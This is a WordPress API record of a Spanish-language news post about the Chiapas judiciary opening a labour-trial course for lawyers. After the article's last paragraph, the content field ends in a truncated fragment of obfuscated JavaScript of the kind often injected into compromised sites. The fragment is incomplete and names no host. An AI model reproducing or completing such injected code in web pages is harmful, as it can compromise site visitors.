{"id":24546,"date":"2025-10-16T02:45:47","date_gmt":"2025-10-16T02:45:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24546"},"modified":"2025-10-16T02:45:47","modified_gmt":"2025-10-16T02:45:47","slug":"poder-judicial-capacita-a-abogadas-y-abogados-chiapanecos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24546","title":{"rendered":"Poder Judicial capacita a abogadas y abogados chiapanecos"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"24547\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251015-WA0007-1024x682.jpg\" alt=\"\" class=\"wp-image-24547\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251015-WA0007-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251015-WA0007-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251015-WA0007-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251015-WA0007-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251015-WA0007.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>15 de octubre del 2025. Con una amplia convocatoria, el Poder Judicial del Estado de Chiapas dio inicio al curso denominado \u201cJuicio Laboral\u201d, dirigido a las y los abogados integrantes de barras y asociaciones chiapanecas.<\/p>\n\n\n\n<p>En modalidad presencial, las y los participantes se dieron cita en las instalaciones del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial (IFPyCJ) para tomar este curso; mientras que, de manera virtual, se conectaron las y los abogados de las distintas regiones del estado.<\/p>\n\n\n\n<p>Para esta actividad, se dise\u00f1aron dos m\u00f3dulos titulados \u201cSensibilizaci\u00f3n en el nuevo modelo de procedimiento laboral\u201d y \u201cEl procedimiento en el nuevo Sistema Laboral Oral\u201d.<\/p>\n\n\n\n<p>Durante el acto protocolario de inauguraci\u00f3n, estuvieron presentes el titular del IFPyCJ, Jos\u00e9 Luis Baltazar Arg\u00fcello, y la ponente del primer m\u00f3dulo, la jueza del Juzgado Primero Especializado en Materia Laboral, Tapachula, Margarita Concepci\u00f3n Rovelo Gonz\u00e1lez.<\/p>\n\n\n\n<p>Con estas actividades, el Poder Judicial del Estado de Chiapas reafirma su compromiso con la formaci\u00f3n continua y el fortalecimiento profesional, no solo de las personas servidoras judiciales, sino tambi\u00e9n de las y los diversos operadores del sistema de justicia, contribuyendo as\u00ed a la consolidaci\u00f3n de un modelo m\u00e1s eficiente, accesible y acorde con las nuevas reformas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>15 de octubre del 2025. Con una amplia convocatoria, el Poder Judicial del Estado de Chiapas dio inicio al curso denominado \u201cJuicio Laboral\u201d, dirigido a las y los abogados integrantes de barras y asociaciones chiapanecas. En modalidad presencial, las y los participantes se dieron cita en las instalaciones del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24548,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24546","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24546"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24546\/revisions"}],"predecessor-version":[{"id":24549,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24546\/revisions\/24549"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24548"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24546"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24546"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}